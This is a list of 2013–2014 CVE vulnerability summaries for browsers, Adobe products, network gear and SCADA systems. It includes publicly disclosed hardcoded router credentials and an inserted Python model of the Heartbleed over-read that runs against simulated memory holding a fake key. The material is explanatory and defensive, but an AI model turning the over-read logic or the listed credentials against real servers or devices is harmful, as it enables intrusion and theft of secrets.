CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, and 6.2.1 and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, and 6.2.1 and 6.2.2 before IF 8, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
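The Heartbleed entry above describes the mechanism in one clause: the heartbeat handler copies as many bytes as the attacker's length field claims, without comparing that claim to the size of the record actually received. The following Python model, added here as an illustration and not taken from OpenSSL or from the report, makes the over-read concrete. Process memory is stood in for by a single byte string in which a fake key fragment sits just after the received record (both constructed for the demo); the vulnerable handler reproduces the pre-1.0.1g logic, and the fixed handler applies the 1.0.1g bounds check (1 + 2 + payload + 16 must not exceed the record length).

```python
import struct
from typing import Optional

TLS1_HB_REQUEST = 1
TLS1_HB_RESPONSE = 2
PADDING = 16  # minimum padding an RFC 6520 heartbeat message carries

# Constructed stand-in for process memory: the received record sits at the
# start and a fake private-key fragment lies just beyond it. Not real key material.
SECRET_AFTER_RECORD = b"-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEA0ex\n"


def build_heartbeat(payload: bytes, claimed_len: int) -> bytes:
    """Heartbeat message: type(1) | payload_length(2) | payload | padding.
    claimed_len is what goes on the wire; a probe sets it far above len(payload)."""
    return bytes([TLS1_HB_REQUEST]) + struct.pack(">H", claimed_len) + payload + b"\x00" * PADDING


def vulnerable_heartbeat(memory: bytes, record_len: int) -> bytes:
    """Pre-1.0.1g behaviour: trust the length field and copy that many bytes
    from the payload start, never comparing it with record_len."""
    hbtype = memory[0]
    (payload_len,) = struct.unpack(">H", memory[1:3])
    if hbtype != TLS1_HB_REQUEST:
        return b""
    echoed = memory[3:3 + payload_len]  # may run past record_len into neighbouring memory
    return bytes([TLS1_HB_RESPONSE]) + struct.pack(">H", payload_len) + echoed


def fixed_heartbeat(memory: bytes, record_len: int) -> Optional[bytes]:
    """1.0.1g behaviour: silently discard if 1 + 2 + payload + 16 exceeds the record."""
    if record_len < 1 + 2 + PADDING:
        return None
    hbtype = memory[0]
    (payload_len,) = struct.unpack(">H", memory[1:3])
    if 1 + 2 + payload_len + PADDING > record_len:
        return None
    if hbtype != TLS1_HB_REQUEST:
        return None
    echoed = memory[3:3 + payload_len]
    return bytes([TLS1_HB_RESPONSE]) + struct.pack(">H", payload_len) + echoed


def run_probe(payload: bytes = b"hello", claimed_len: int = 200):
    """Send a Heartbleed-style request (tiny payload, large claimed length)
    through both handlers and return (vulnerable_reply, fixed_reply)."""
    record = build_heartbeat(payload, claimed_len)
    memory = record + SECRET_AFTER_RECORD
    return vulnerable_heartbeat(memory, len(record)), fixed_heartbeat(memory, len(record))


if __name__ == "__main__":
    leaked, safe = run_probe()
    print("vulnerable handler echoed", len(leaked) - 3, "bytes:", leaked[3:])
    print("fixed handler reply:", safe)
```

The point a patch-management control cannot make on its own: no amount of firewalling helps here, because the request is a legitimate TLS record arriving on an open port; only the fixed handler (i.e. the patched library) refuses it.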
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X and before 11.2.202.356 on Linux allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
